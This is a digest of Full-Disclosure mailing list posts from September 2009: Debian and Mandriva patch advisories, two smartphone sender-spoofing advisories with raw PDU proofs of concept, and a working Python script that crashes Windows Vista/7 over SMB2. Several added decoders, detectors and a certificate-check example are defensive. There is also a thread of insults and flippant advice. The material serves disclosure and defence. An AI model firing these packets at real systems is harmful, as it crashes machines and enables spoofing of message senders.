[Full-disclosure] [SECURITY] [DSA 1878-2] New devscripts packages fix regressions

2009-09-11 Thread Florian Weimer

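------------------------------------------------------------------------
Debian Security Advisory DSA-1878-2                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
September 11, 2009                    http://www.debian.org/security/faq
------------------------------------------------------------------------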

Package: devscripts
Vulnerability  : missing input sanitation
Problem type   : remote
Debian-specific: yes
CVE Id(s)  : CVE-2009-2946

This update corrects regressions introduced by the devscripts security
update, DSA-1878-1.  The original announcement was:

Raphael Geissert discovered that uscan, a program to check for
availability of new source code versions which is part of the
devscripts package, runs Perl code downloaded from potentially
untrusted sources to implement its URL and version mangling
functionality.  This update addresses this issue by reimplementing the
relevant Perl operators without relying on the Perl interpreter,
trying to preserve backwards compatibility as much as possible.

For the old stable distribution (etch), this problem has been fixed in
version 2.9.26etch5.

For the stable distribution (lenny), this problem has been fixed in
version 2.10.35lenny7.

For the unstable distribution (sid), this problem will be fixed in
version 2.10.55.

We recommend that you upgrade your devscripts package.

Upgrade instructions
- 

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.



Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-11 Thread mrx
 


I am not smart enough to understand what you mean, all this talk with
numbers is way over my head.

To sign, or not to sign: that is the question:
Whether 'tis the nobbler in the mail or buffer,
the strings and arrows do mis-appropriate fortune,
or take armor 1.4 against those floats and doubles.
And by opposing end them? To spy the heap
no more, and by a beep to say we send.
The heartache and the thousand natural socks
netcat is heir to, tis disinformation
devoutly to be phished. To ply, to reap.
To reap perchance to scheme: ay, there's the sub.
For in that heap of death what streams may run?
When we have shuffled through this portal spoil
that which gave us cause: to show respect.


with apologies to Shakespeare
MrX




T Biehn wrote:
 Should call yourself z3r0k3w1.
 It would be 'krad elite.'
 /obv. reference dropping.

 -Travis

 On Thu, Sep 10, 2009 at 5:23 PM, mrx m...@propergander.org.uk wrote:
 *
 *We have a code 4 on that 10-103m

 regards
 the real MrX


 T Biehn wrote:
 MrX,
 Dude.
 Just fake your own suicide. This old school trick will solicit the
 feds to your locale if you're actually being watched.

 Other advice?

 I want voice recordings, jpegs, vlog posts, else it didn't happen 
 you're schizoid.

 -Travis

 On Wed, Sep 9, 2009 at 11:04 PM, Nick FitzGerald
 n...@virus-l.demon.co.uk wrote:

 TheLearner wrote:

 snip

 What would you do?

 I'm not sure what _I_ would do facing such a crisis, but I think the
 best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer
 (s/he has been posting to this list lately, so should be easy to track
 down), and then get those two uber hackers to help as well -- they'll
 be much more help _to you_ than any private eye ever will...



 Regards,

 Nick FitzGerald


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/












[Full-disclosure] Hack-Mail.net or similar site

2009-09-11 Thread mamo
Hello,

What do you think of web sites like Hack-Mail.net or similar ones?
Do they really work and how?

Thank you,
 Mamo



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread D-vice
you the fuckard that got owned

LULz

On Fri, Sep 11, 2009 at 2:36 AM, Dan Kaminsky d...@doxpara.com wrote:

 Beyond that, most web applications that do use SSL, still forget to set
 their cookies to secure (see
 http://fscked.org/blog/incomplete-list-alleged-vulnerable-sites ).  Not to
 mention the hordes of sites that have SSL logins off HTTP pages.  Even the
 oft-repeated "well, the attacker won't get the plaintext password" claim
 falls to the attacker who inserts some screen or keyboard sniffing JS into
 the login page.

 That being said, there probably is some class of attacker that can only do
 passive monitoring as opposed to active interception.  But it's not exactly
 a quantization to hang one's hat on.


 On Thu, Sep 10, 2009 at 5:36 PM, awf awf lol-wut-h...@live.com wrote:

  And?  Every web application sends passwords as plain text unless they are
 using SSL.  Pretty much any encryption that they may do client side that
 isn't SSL is meaningless.  I hardly see how being able to sniff passwords
 from a site that isn't using SSL is big news.


[Full-disclosure] Multiple Smartphones MMS Notification Sender Obfuscation

2009-09-11 Thread c0rnholio
Security Advisory: Multiple Smartphones MMS Notification Sender Obfuscation
---

Discovered by: Michael Mueller a.k.a. c0rnholio
Contact: c0rnholio on domain netcologne.de
Advisory Homepage: http://www.silentservices.de/adv04-2009.html
Vendor Status: not contacted
Fixes / Workarounds: none known
Discovery Date: June, 2008
Public Disclosure: 11.09.2009

Description:

An MMS Notification is part of the MMS communication flow. Usually an 
originator sends an MMS via a service provider (SP). After uploading the 
message to the SP, the recipient gets a MMS notification from the SP with 
information like originator, subject and URL of the content. In some mobile 
carrier networks it is allowed to send MMS notifications directly from one 
mobile unit to another.

Some Smartphones fail to properly display the originator of this kind of 
message which leads to a sender obfuscation.

Impact:
---
This attack can be used in combination with social engineering to mislead 
the recipient to access the resource specified in the content URL of the MMS 
notification message. If the receiving device MMS client is configured 
improperly this could lead to automatic download of whatever content is 
specified in the content URL. MMS clients which do not allow access to 
content URLs other than the provider's MMS proxy should be safe from the 
content, but are still vulnerable to the sender obfuscation.

In addition this attack can be used to send spam and hate SMS.


Tested Devices:
---
The following devices have been tested and found vulnerable for this kind of 
attack:
It is very likely that other devices and vendors are also vulnerable to this 
attack.

-   Blackberry (Tested on BB 8800, Firmware: 4.5.0.37)
The BlackBerry device fails to properly display the originating number 
and displays whatever information is defined in the originator and the 
subject field of the MMS notification.

-   Windows Mobile (Tested on WM5, WM6, WM6.1, WM6.5)
A Windows Mobile driven device fails to properly display the originating 
number and displays whatever information is defined in the originator and 
the subject field of the MMS notification.

-   Sony Ericsson W890i, W810i
The Sony Ericsson W890i and W810i device fails to properly display the 
correct originating number and displays whatever information is defined in 
the originator and the subject field of the MMS notification.


PoC:

The following PDU can be sent to an affected device:

UDH: 05 04 0b 84 23 f0
Message:
7c 06 03 be af 84 8c 82 98 31 32 33 34 00 8d 90 89 0e 80 45 76 69 6c 20 48 
34 78 30 72 00 96 67 6f 74 20 72 30 30 74 3f 00 8a 80 8e 01 56 88 05 81 03 
09 3a 80 83 63 68 65 63 6b 20 79 6f 75 72 20 6d 6d 73 20 63 6c 69 65 6e 74

The above PDU will display as follows (example on Windows Mobile target):

Sender: Evil H4x0r
Subject: got r00t?

Use pduspy to send it. In addition HushSMS Version 1.0 will be available 
soon for Windows Mobile devices for further tests.



 



[Full-disclosure] Multiple Smartphones SMS Sender Obfuscation via WAP Push SI

2009-09-11 Thread c0rnholio
Security Advisory: Multiple Smartphones SMS Sender Obfuscation via WAP Push 
SI
--

Discovered by: Michael Mueller a.k.a. c0rnholio
Contact: c0rnholio on domain netcologne.de
Advisory Homepage: http://www.silentservices.de/adv03-2009.html
Vendor Status: not contacted
Fixes / Workarounds: none known
Discovery Date: June, 2008
Public Disclosure: 11.09.2009

Description:

WAP Push SI (Service Indication) is a special service SMS which allows 
operators or everyone else to provide an easy way for alerting the 
smartphone user about new services or online resources. (see specification 
WAP-167 for further details)
Some Smartphones fail to properly display the originator of this kind of 
message which leads to a sender obfuscation.

Impact:
---
This attack can be used in combination with social engineering to mislead 
the recipient to access the resource specified in the WAP Push SI message 
(usually an online resource).

In addition this attack can be used to send spam and hate SMS.


Tested Devices:
---
The following devices have been tested and found vulnerable for this kind of 
attack:
It is very likely that other devices and vendors are also vulnerable to this 
attack.

-   Blackberry (Tested on BB 8800, Firmware: 4.5.0.37)
The BlackBerry fails to report the correct originating number and displays 
the number of the SMS service center as originator of the message.

-   Windows Mobile (Tested on WM5, WM6, WM6.1, WM6.5)
A Windows Mobile driven device fails to properly display the originating 
number and displays whatever information is defined in the 
X-WAP-Initiator-URI field.

-   Sony Ericsson W890i, W810i
The Sony Ericsson W890i and W810i device fails to properly display the 
correct originating number and displays a default string instead.

-   Motorola RazrV3
The Motorola RazrV3 device fails to properly display the correct originating 
number and displays a default string instead.

PoC:

The following PDU can be sent to an affected device:

UDH: 05 04 0b 84 23 f0
Message:
dc 06 11 ae af 82 b4 83 b1 45 76 69 6c 20 48 34 78 30 72 00 02 05 6a 00 45 
c6 0c 03 77 77 77 2e 73 69 6c 65 6e 74 73 65 72 76 69 63 65 73 2e 64 65 2f 
61 64 76 30 33 2d 32 30 30 39 2e 68 74 6d 6c 00 01 03 67 6f 74 20 72 30 30 
74 3f 00 01 01

The above PDU will display as follows (example on Windows Mobile target):

Sender: Evil H4x0r
Subject: got r00t?
Message: http://www.silentservices.de/adv03-2009.html

Use pduspy to send it. In addition HushSMS Version 1.0 will be available 
soon for Windows Mobile devices for further tests.


 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
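
The PoC PDU above, decoded as an added example (not code from the advisory, pduspy or HushSMS): it splits the WSP Push headers from the WBXML SI body and shows that the sender string comes from the X-Wap-Initiator-URI header while the link and text come from the body. The token tables cover only the WSP and WAP-167 codes this PDU uses, and the two checks in `assess_si_push` are illustrative heuristics chosen for this example.

```python
from urllib.parse import urlsplit

# WSP well-known codes seen in the PoC (subset of the WSP assigned numbers).
SI_CONTENT_TYPE = 0x2E  # application/vnd.wap.sic
HEADER_NAMES = {0x2F: "X-Wap-Application-Id", 0x31: "X-Wap-Initiator-URI",
                0x34: "Push-Flag"}
# WBXML attribute tokens from the SI 1.0 token table (WAP-167) that build href.
HREF_PREFIX = {0x0B: "", 0x0C: "http://", 0x0D: "http://www.",
               0x0E: "https://", 0x0F: "https://www."}
DOMAIN_TOKENS = {0x85: ".com/", 0x86: ".edu/", 0x87: ".net/", 0x88: ".org/"}

# "Message:" bytes copied from the advisory's PoC (the UDH is not included).
SI_PDU = bytes.fromhex(
    "dc 06 11 ae af 82 b4 83 b1 45 76 69 6c 20 48 34 78 30 72 00 02 05 6a 00 45"
    " c6 0c 03 77 77 77 2e 73 69 6c 65 6e 74 73 65 72 76 69 63 65 73 2e 64 65 2f"
    " 61 64 76 30 33 2d 32 30 30 39 2e 68 74 6d 6c 00 01 03 67 6f 74 20 72 30 30"
    " 74 3f 00 01 01")

def read_cstring(buf, pos):
    """Read a NUL-terminated string at pos; return (text, next position)."""
    end = buf.index(0, pos)  # raises ValueError if the terminator is missing
    return buf[pos:end].decode("utf-8", "replace"), end + 1

def parse_wsp_push(pdu):
    """Split a WSP Push PDU into (content-type code, headers dict, body)."""
    if len(pdu) < 4 or pdu[1] != 0x06:
        raise ValueError("not a WSP Push PDU")
    hlen = pdu[2]
    if hlen & 0x80 or 3 + hlen > len(pdu):
        raise ValueError("unsupported or truncated header length")
    hdr, body = pdu[3:3 + hlen], pdu[3 + hlen:]
    if not hdr or not hdr[0] & 0x80:
        raise ValueError("only well-known content types are handled")
    headers, pos = {}, 1
    while pos < len(hdr):
        if not hdr[pos] & 0x80 or pos + 1 >= len(hdr):
            raise ValueError("unsupported or truncated header")
        name = HEADER_NAMES.get(hdr[pos] & 0x7F, hex(hdr[pos] & 0x7F))
        first = hdr[pos + 1]
        if first & 0x80:      # short-integer value
            value, pos = first & 0x7F, pos + 2
        elif first >= 0x20:   # NUL-terminated text value
            value, pos = read_cstring(hdr, pos + 1)
        else:
            raise ValueError("length-prefixed header values are not handled")
        headers[name] = value
    return hdr[0] & 0x7F, headers, body

def parse_si_body(body):
    """Return (href, text) from a WBXML SI 1.0 document (token subset only)."""
    if len(body) < 4 or body[1] != 0x05 or body[3] & 0x80:
        raise ValueError("not a WBXML SI 1.0 document")
    pos = 4 + body[3]  # skip version, public id, charset and string table
    href, text, in_attrs, in_href = "", "", False, False
    while pos < len(body):
        tok = body[pos]
        pos += 1
        if tok == 0x03:       # STR_I: inline string
            s, pos = read_cstring(body, pos)
            if not in_attrs:
                text += s
            elif in_href:
                href += s
        elif tok == 0x01:     # END of an attribute list or of an element
            in_attrs = in_href = False
        elif tok == 0xC3:     # OPAQUE: skip the length byte and the data
            pos += 1 + body[pos]
        elif in_attrs:
            if tok in HREF_PREFIX:            # start of the href attribute
                href, in_href = HREF_PREFIX[tok], True
            elif in_href and tok in DOMAIN_TOKENS:
                href += DOMAIN_TOKENS[tok]
            else:                             # some other attribute starts
                in_href = False
        elif tok & 0x80:      # element tag that is followed by attributes
            in_attrs = True
    return href, text

def assess_si_push(pdu):
    """Decode a WAP Push SI PDU and list reasons to distrust its sender label."""
    ctype, headers, body = parse_wsp_push(pdu)
    if ctype != SI_CONTENT_TYPE:
        raise ValueError("not a Service Indication push")
    href, text = parse_si_body(body)
    initiator = headers.get("X-Wap-Initiator-URI")
    findings = []
    if isinstance(initiator, str):
        claimed = urlsplit(initiator)
        if not (claimed.scheme and claimed.netloc):
            findings.append("initiator is free text, not a URI")
        elif claimed.hostname != urlsplit(href).hostname:
            findings.append("initiator host differs from href host")
    return {"initiator": initiator, "href": href, "text": text,
            "findings": findings}

if __name__ == "__main__":
    print(assess_si_push(SI_PDU))
```

Neither header nor body carries the originating number, which only exists in the SMS layer below; that is why a client that labels the message from these fields shows whatever the sender chose.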


[Full-disclosure] 0xHACK - Oxford Info-Sec Group

2009-09-11 Thread James Whayman
A couple of us in Oxford have decided to start a small, special
interests group. Anyone interested is welcome to come along, no
charge.

September 15th, 2009
Lamb & Flag, Oxford. 8pm

Agenda

The first meeting will focus on organising following meetings and
setting an agenda. There will be a demonstration on the use of OllyDbg
as a _legal_ cracking tool and discussion regarding fuzzing
frameworks.

http://0xhack.org



[Full-disclosure] [ MDVSA-2009:229 ] cyrus-imapd

2009-09-11 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:229
 http://www.mandriva.com/security/
 ___

 Package : cyrus-imapd
 Date: September 11, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in cyrus-imapd:
 
 Buffer overflow in the SIEVE script component (sieve/script.c) in
 cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14 allows local users
 to execute arbitrary code and read or modify arbitrary messages via
 a crafted SIEVE script, related to the incorrect use of the sizeof
 operator for determining buffer length, combined with an integer
 signedness error (CVE-2009-2632).
 
 This update provides a solution to this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2632
 ___

 Updated Packages:


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-11 Thread laurent gaffie
Advisory updated :


=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
-
Windows Vista, Server 2008  R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows Vista and newer Windows versions come with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
[Edit]Unfortunately this SMB2 security issue is specifically due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 creates the following
issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB
server, and it's used to identify the SMB dialect that will be used for
further communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the Process Id High SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: -- :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
Windows XP, 2k, are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
R2, Windows 7 RC.

VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It won't be done, if they find a way to execute code, they will publish their
advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
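
A detection-side reading of the advisory above, as an added example (not the author's code): it parses a NetBIOS-framed SMB1 Negotiate Protocol request and reports a non-zero Process ID High field along with basic length inconsistencies. It assumes, following the PoC comment, that Process ID High is normally zero in this request; the frames it runs on are constructed samples, not captured traffic.

```python
import struct

# SMB1 header: magic, command, status, flags, flags2, PID high,
# security features, reserved, TID, PID low, UID, MID (32 bytes).
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_REPLY = 0x80


def parse_dialects(data):
    """Split the Negotiate data block into dialect names."""
    names, pos = [], 0
    while pos < len(data):
        if data[pos] != 0x02:            # each entry starts with format byte 0x02
            raise ValueError("bad dialect buffer format")
        end = data.find(b"\x00", pos + 1)
        if end < 0:
            raise ValueError("unterminated dialect string")
        names.append(data[pos + 1:end].decode("ascii", "replace"))
        pos = end + 1
    return names


def inspect_negotiate(frame):
    """Return findings for an SMB1 Negotiate request, or None for other frames."""
    if len(frame) < 4 + SMB1_HEADER.size + 3 or frame[0] != 0x00:
        return None
    declared = int.from_bytes(frame[1:4], "big")   # NetBIOS session length
    smb = frame[4:]
    fields = SMB1_HEADER.unpack_from(smb)
    magic, command, flags, pid_high = fields[0], fields[1], fields[3], fields[5]
    if magic != b"\xffSMB" or command != SMB_COM_NEGOTIATE or flags & SMB_FLAGS_REPLY:
        return None
    findings, dialects = [], []
    if declared != len(smb):
        findings.append("NetBIOS length does not match payload")
    body = smb[SMB1_HEADER.size:]
    word_count, byte_count = body[0], int.from_bytes(body[1:3], "little")
    if word_count != 0 or byte_count != len(body) - 3:
        findings.append("parameter/data counts inconsistent")
    else:
        try:
            dialects = parse_dialects(body[3:])
        except ValueError as exc:
            findings.append(str(exc))
    if pid_high != 0:
        findings.append("non-zero Process ID High (0x%04x)" % pid_high)
    return {"dialects": dialects, "pid_high": pid_high, "findings": findings}


def constructed_frame(pid_high):
    """Constructed sample: a two-dialect Negotiate request with the given PID High."""
    data = b"".join(b"\x02" + d + b"\x00" for d in (b"NT LM 0.12", b"SMB 2.002"))
    header = SMB1_HEADER.pack(b"\xffSMB", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                              pid_high, bytes(8), 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + b"\x00" + len(data).to_bytes(2, "little") + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    for value in (0x0000, 0x2600):       # 0x2600 is the PoC's bytes 00 26, little-endian
        print(hex(value), inspect_negotiate(constructed_frame(value)))
```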

Re: [Full-disclosure] 0xHACK - Oxford Info-Sec Group

2009-09-11 Thread Rohit Patnaik
Apparently they didn't tell him that 'h' wasn't a valid hex symbol either.

--Rohit Patnaik

Lolek of TK53 wrote:
 On Fri, Sep 11, 2009 at 2:40 PM, James Whayman whayman...@gmail.com wrote:
   
 http://0xhack.org
 

 didn't your profs tell you that K is no valid hexadecimal character?
 scnr



[Full-disclosure] [ MDVSA-2009:230 ] pidgin

2009-09-11 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:230
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: September 11, 2009
 Affected: 2009.0, 2009.1, Enterprise Server 5.0
 ___

 Problem Description:

 Security vulnerabilities have been identified and fixed in pidgin:
 
 The msn_slplink_process_msg function in
 libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin
 (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows
 remote attackers to execute arbitrary code or cause a denial of service
 (memory corruption and application crash) by sending multiple crafted
 SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary
 memory location.  NOTE: this issue reportedly exists because of an
 incomplete fix for CVE-2009-1376 (CVE-2009-2694).
 
 Unspecified vulnerability in Pidgin 2.6.0 allows remote attackers
 to cause a denial of service (crash) via a link in a Yahoo IM
 (CVE-2009-3025)
 
 protocols/jabber/auth.c in libpurple in Pidgin 2.6.0, and possibly
 other versions, does not follow the "require TLS/SSL" preference
 when connecting to older Jabber servers that do not follow the XMPP
 specification, which causes libpurple to connect to the server without
 the expected encryption and allows remote attackers to sniff sessions
 (CVE-2009-3026).
 
 libpurple/protocols/irc/msgs.c in the IRC protocol plugin in libpurple
 in Pidgin before 2.6.2 allows remote IRC servers to cause a denial
 of service (NULL pointer dereference and application crash) via a
 TOPIC message that lacks a topic string (CVE-2009-2703).
 
 The msn_slp_sip_recv function in libpurple/protocols/msn/slp.c in the
 MSN protocol plugin in libpurple in Pidgin before 2.6.2 allows remote
 attackers to cause a denial of service (NULL pointer dereference
 and application crash) via an SLP invite message that lacks certain
 required fields, as demonstrated by a malformed message from a KMess
 client (CVE-2009-3083).
 
 The msn_slp_process_msg function in libpurple/protocols/msn/slpcall.c
 in the MSN protocol plugin in libpurple 2.6.0 and 2.6.1, as used in
 Pidgin before 2.6.2, allows remote attackers to cause a denial of
 service (application crash) via a handwritten (aka Ink) message,
 related to an uninitialized variable and the incorrect UTF16-LE
 charset name (CVE-2009-3084).
 
 The XMPP protocol plugin in libpurple in Pidgin before 2.6.2 does
 not properly handle an error IQ stanza during an attempted fetch of
 a custom smiley, which allows remote attackers to cause a denial of
 service (application crash) via XHTML-IM content with cid: images
 (CVE-2009-3085).
 
 This update provides pidgin 2.6.2, which is not vulnerable to these
 issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3025
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3026
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2703
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3083
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3084
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3085
 http://pidgin.im/news/security/
 ___

 Updated Packages:


Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread Valdis . Kletnieks
On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said:

 you the fuckard that got owned

You're just jealous that Dan is well-known enough to be a target, and quite
likely jealous of the fact that Dan *has* a site to be targeted.



[Full-disclosure] [ MDVSA-2009:228 ] libneon

2009-09-11 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:228
 http://www.mandriva.com/security/
 ___

 Package : libneon
 Date: September 10, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
   Enterprise Server 5.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in neon:
 
 neon before 0.28.6, when OpenSSL is used, does not properly handle
 a '\0' character in a domain name in the subject's Common Name
 (CN) field of an X.509 certificate, which allows man-in-the-middle
 attackers to spoof arbitrary SSL servers via a crafted certificate
 issued by a legitimate Certification Authority, a related issue to
 CVE-2009-2408. (CVE-2009-2474)
 
 This update provides a solution to this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2474
 ___

 Updated Packages:

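The flaw class described in the libneon advisory above, as an added example that is not neon's or OpenSSL's code: a Common Name compared as a C string stops at the first '\0', while a check that uses the field's declared length and rejects embedded NULs does not. The `cn_field` type, the function names and the sample CN bytes are constructed for illustration; wildcard and subjectAltName handling are left out.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* A certificate name as the ASN.1 layer delivers it: bytes plus an
 * explicit length, not a C string. (Hypothetical type for this example.) */
struct cn_field { const unsigned char *data; size_t len; };

/* Constructed samples; sizeof - 1 keeps the embedded '\0' in the length. */
static const unsigned char BAD_BYTES[] = "www.example.com\0.untrusted.example";
static const unsigned char GOOD_BYTES[] = "www.example.com";
static const struct cn_field BAD_CN = { BAD_BYTES, sizeof BAD_BYTES - 1 };
static const struct cn_field GOOD_CN = { GOOD_BYTES, sizeof GOOD_BYTES - 1 };

/* Case-insensitive comparison of exactly n bytes. */
static int eq_nocase(const unsigned char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower(a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Flawed pattern: strlen() stops at the first '\0', so everything the CA
 * actually signed after that byte is ignored by the comparison. */
int cn_matches_naive(const struct cn_field *cn, const char *host)
{
    size_t n = strlen((const char *)cn->data);
    return n == strlen(host) && eq_nocase(cn->data, host, n);
}

/* Hardened pattern: use the declared length, and reject any '\0' inside
 * the field, since a DNS name can never contain one. */
int cn_matches_strict(const struct cn_field *cn, const char *host)
{
    if (cn->len == 0 || memchr(cn->data, '\0', cn->len) != NULL)
        return 0;
    return cn->len == strlen(host) && eq_nocase(cn->data, host, cn->len);
}

int main(void)
{
    printf("naive,  NUL in CN: %d\n", cn_matches_naive(&BAD_CN, "www.example.com"));
    printf("strict, NUL in CN: %d\n", cn_matches_strict(&BAD_CN, "www.example.com"));
    printf("strict, clean CN:  %d\n", cn_matches_strict(&GOOD_CN, "www.example.com"));
    return 0;
}
```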
 

[Full-disclosure] [ MDVSA-2009:197-2 ] nss

2009-09-11 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:197-2
 http://www.mandriva.com/security/
 ___

 Package : nss
 Date    : September 11, 2009
 Affected: 2008.1
 ___

 Problem Description:

 Security issues in nss prior to 3.12.3 could lead to a
 man-in-the-middle attack via a spoofed X.509 certificate
 (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also
 cause a denial-of-service and possible code execution via a long
 domain name in X.509 certificate (CVE-2009-2404).
 
 This update provides the latest versions of NSS and NSPR libraries
 which are not vulnerable to those attacks.

 Update:

 This update also provides fixed packages for Mandriva Linux 2008.1
 and fixes mozilla-thunderbird error messages.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com


Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread full-censorship
On Fri, 11 Sep 2009 17:27:53 +0100 valdis.kletni...@vt.edu wrote:
> On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said:
>
>> you the fuckard that got owned
>
> You're just jealous that Dan is well-known enough to be a target,

would one not rather hire someone *not* well-known and *doesn't* 
get owned?



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread Valdis . Kletnieks
On Fri, 11 Sep 2009 21:49:00 BST, you said:

> would one not rather hire someone *not* well-known and *doesn't*
> get owned?

Feel free to hire that guy flipping burgers at McD's to do your security
assessment.  Let me know how it turns out.

Also, remember that there is an asymmetric component to this - the sysadmin
has to stop *every* attack to remain un-owned, but the attacker only needs one.

And there's always the security is tradeoffs component - Dan's a smart guy,
and knows he can't secure every server perfectly.  So he figures out what he
has to do to limit the likelihood, and takes his chances.  If you estimate that
